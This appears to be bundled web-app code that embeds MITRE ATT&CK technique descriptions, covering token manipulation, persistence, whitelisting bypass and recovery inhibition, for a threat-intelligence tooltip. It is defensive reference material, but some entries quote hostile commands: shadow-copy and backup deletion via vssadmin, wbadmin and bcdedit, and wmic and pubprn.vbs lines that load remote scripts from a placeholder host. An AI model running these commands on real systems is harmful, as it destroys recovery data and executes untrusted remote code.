under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.\n\n**Make and Impersonate Token** - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.\n\nMetasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. (Citation: Metasploit access token)  The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)","tactics":["defense-evasion","privilege-escalation"],"externalId":"T1134","externalUrl":"https://attack.mitre.org/techniques/T1134"},"key":"mitre/access-token-manipulation"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Time Providers","version":"1.0","description":"The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)","tactics":["persistence"],"externalId":"T1209","externalUrl":"https://attack.mitre.org/techniques/T1209"},"key":"mitre/time-providers"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Two-Factor Authentication Interception","version":"1.0","description":"Use of two- or multifactor authentication is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. Adversaries may target authentication mechanisms, such as smart cards, to gain access to systems, services, and network resources.\n\nIf a smart card is used for two-factor authentication (2FA), then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)","tactics":["credential-access"],"externalId":"T1111","externalUrl":"https://attack.mitre.org/techniques/T1111"},"key":"mitre/two-factor-authentication-interception"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Launch Agent","version":"1.0","description":"Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in /System/Library/LaunchAgents, /Library/LaunchAgents, and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).","tactics":["persistence"],"externalId":"T1159","externalUrl":"https://attack.mitre.org/techniques/T1159"},"key":"mitre/launch-agent"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Create Account","version":"1.0","description":"Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.\n\nThe net user commands can be used to create a local or domain account.","tactics":["persistence"],"externalId":"T1136","externalUrl":"https://attack.mitre.org/techniques/T1136"},"key":"mitre/create-account"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Space after Filename","version":"1.0","description":"Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to \"evil.txt \" (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back). \n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.","tactics":["defense-evasion","execution"],"externalId":"T1151","externalUrl":"https://attack.mitre.org/techniques/T1151"},"key":"mitre/space-after-filename"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Remote System Discovery","version":"1.1","description":"Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. \n\n### Windows\n\nExamples of tools and commands that acquire this information include \"ping\" or \"net view\" using [Net](https://attack.mitre.org/software/S0039). The contents of the C:\\Windows\\System32\\Drivers\\etc\\hosts file can be viewed to gain insight into the existing hostname to IP mappings on the system.\n\n### Mac\n\nSpecific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as \"ping\" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system.\n\n### Linux\n\nUtilities such as \"ping\" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system.","tactics":["discovery"],"externalId":"T1018","externalUrl":"https://attack.mitre.org/techniques/T1018"},"key":"mitre/remote-system-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Network Service Scanning","version":"1.0","description":"Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.","tactics":["discovery"],"externalId":"T1046","externalUrl":"https://attack.mitre.org/techniques/T1046"},"key":"mitre/network-service-scanning"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exfiltration Over Physical Medium","version":"1.0","description":"In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.","tactics":["exfiltration"],"externalId":"T1052","externalUrl":"https://attack.mitre.org/techniques/T1052"},"key":"mitre/exfiltration-over-physical-medium"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Remote File Copy","version":"1.0","description":"Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\n\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).","tactics":["command-and-control","lateral-movement"],"externalId":"T1105","externalUrl":"https://attack.mitre.org/techniques/T1105"},"key":"mitre/remote-file-copy"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Network Share Connection Removal","version":"1.0","description":"Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)\n\nAdversaries may remove share connections that are no longer useful in order to clean up traces of their operation.","tactics":["defense-evasion"],"externalId":"T1126","externalUrl":"https://attack.mitre.org/techniques/T1126"},"key":"mitre/network-share-connection-removal"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Windows Management Instrumentation Event Subscription","version":"1.0","description":"Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts. (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)","tactics":["persistence"],"externalId":"T1084","externalUrl":"https://attack.mitre.org/techniques/T1084"},"key":"mitre/windows-management-instrumentation-event-subscription"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Launch Daemon","version":"1.0","description":"Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\n \nAdversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software  (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.\n \nThe plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.","tactics":["persistence","privilege-escalation"],"externalId":"T1160","externalUrl":"https://attack.mitre.org/techniques/T1160"},"key":"mitre/launch-daemon"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Group Policy Modification","version":"1.0","description":"Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. \n\nGroup policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Disabling Security Tools](https://attack.mitre.org/techniques/T1089), [Remote File Copy](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035) and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) Publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)","tactics":["defense-evasion"],"externalId":"T1484","externalUrl":"https://attack.mitre.org/techniques/T1484"},"key":"mitre/group-policy-modification"},{"type":"mitre","subtype":"technique","metadata":{"technique":"XSL Script Processing","version":"1.0","description":"Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018)\n\nCommand-line example: (Citation: Penetration Testing Lab MSXSL July 2017)\n\n* msxsl.exe customers[.]xml script[.]xsl\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file. (Citation: subTee WMIC XSL APR 2018) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool.\n\nCommand-line examples: (Citation: subTee WMIC XSL APR 2018)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”","tactics":["defense-evasion","execution"],"externalId":"T1220","externalUrl":"https://attack.mitre.org/techniques/T1220"},"key":"mitre/xsl-script-processing"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Dynamic Data Exchange","version":"1.1","description":"Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nAdversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.","tactics":["execution"],"externalId":"T1173","externalUrl":"https://attack.mitre.org/techniques/T1173"},"key":"mitre/dynamic-data-exchange"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Fallback Channels","version":"1.0","description":"Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.","tactics":["command-and-control"],"externalId":"T1008","externalUrl":"https://attack.mitre.org/techniques/T1008"},"key":"mitre/fallback-channels"},{"type":"mitre","subtype":"technique","metadata":{"technique":"NTFS File Attributes","version":"1.0","description":"Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)","tactics":["defense-evasion"],"externalId":"T1096","externalUrl":"https://attack.mitre.org/techniques/T1096"},"key":"mitre/ntfs-file-attributes"},{"type":"mitre","subtype":"technique","metadata":{"technique":"System Time Discovery","version":"1.0","description":"The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\n\nAn adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.","tactics":["discovery"],"externalId":"T1124","externalUrl":"https://attack.mitre.org/techniques/T1124"},"key":"mitre/system-time-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Service Execution","version":"1.0","description":"Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.","tactics":["execution"],"externalId":"T1035","externalUrl":"https://attack.mitre.org/techniques/T1035"},"key":"mitre/service-execution"},{"type":"mitre","subtype":"technique","metadata":{"technique":"PowerShell","version":"1.1","description":"PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)","tactics":["execution"],"externalId":"T1086","externalUrl":"https://attack.mitre.org/techniques/T1086"},"key":"mitre/powershell"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Firmware Corruption","version":"1.0","description":"Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.","tactics":["impact"],"externalId":"T1495","externalUrl":"https://attack.mitre.org/techniques/T1495"},"key":"mitre/firmware-corruption"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Inhibit System Recovery","version":"1.0","description":"Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no","tactics":["impact"],"externalId":"T1490","externalUrl":"https://attack.mitre.org/techniques/T1490"},"key":"mitre/inhibit-system-recovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Signed Script Proxy Execution","version":"1.0","description":"Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.\n\nPubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: cscript C[:]\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png\n\nThere are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)","tactics":["defense-evasion","execution"],"externalId":"T1216","externalUrl":"https://attack.mitre.org/techniques/T1216"},"key":"mitre/signed-script-proxy-execution"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Custom Command and Control Protocol","version":"1.0","description":"Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Standard Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.","tactics":["command-and-control"],"externalId":"T1094","externalUrl":"https://attack.mitre.org/techniques/T1094"},"key":"mitre/custom-command-and-control-protocol"},{"type":"mitre","subtype":"technique","metadata":{"technique":"InstallUtil","version":"1.1","description":"InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft.\n\nAdversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)","tactics":["defense-evasion","execution"],"externalId":"T1118","externalUrl":"https://attack.mitre.org/techniques/T1118"},"key":"mitre/installutil"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Commonly Used Port","version":"1.0","description":"Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol. \n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)","tactics":["command-and-control"],"externalId":"T1043","externalUrl":"https://attack.mitre.org/techniques/T1043"},"key":"mitre/commonly-used-port"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exploitation for Defense Evasion","version":"1.0","description":"Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1063). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.","tactics":["defense-evasion"],"externalId":"T1211","externalUrl":"https://attack.mitre.org/techniques/T1211"},"key":"mitre/exploitation-for-defense-evasion"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Trusted Developer Utilities","version":"1.0","description":"There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.\n\n### MSBuild\n\nMSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. (Citation: MSDN MSBuild) \n\nAdversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. (Citation: MSDN MSBuild) Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)\n\n### DNX\n\nThe .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016. (Citation: Microsoft Migrating from DNX) DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft. \n\nAn adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX. (Citation: engima0x3 DNX Bypass)\n\n### RCSI\n\nThe rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution. (Citation: Microsoft Roslyn CPT RCSI) The rcsi.exe binary is signed by Microsoft. (Citation: engima0x3 RCSI Bypass)\n\nC# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe. (Citation: engima0x3 RCSI Bypass)\n\n### WinDbg/CDB\n\nWinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools. (Citation: Microsoft Debugging Tools for Windows) They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.\n\nAn adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities. (Citation: Exploit Monday WinDbg)\n\nIt is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.\n\n### Tracker\n\nThe file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system. (Citation: Microsoft Docs File Tracking)\n\nAn adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. (Citation: Twitter SubTee Tracker.exe)","tactics":["defense-evasion","execution"],"externalId":"T1127","externalUrl":"https://attack.mitre.org/techniques/T1127"},"key":"mitre/trusted-developer-utilities"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Windows Admin Shares","version":"1.0","description":"Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)\n\nThe [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)","tactics":["lateral-movement"],"externalId":"T1077","externalUrl":"https://attack.mitre.org/techniques/T1077"},"key":"mitre/windows-admin-shares"}],"meta":{"enterprise_tactics":12,"enterprise_techniques":244}}

/***/ }),
/* 3554 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return MitreInfoTagTooltip; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__shared_styles__ = __webpack_require__(3555);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_themes_common_globalSnippets_styles__ = __webpack_require__(891);
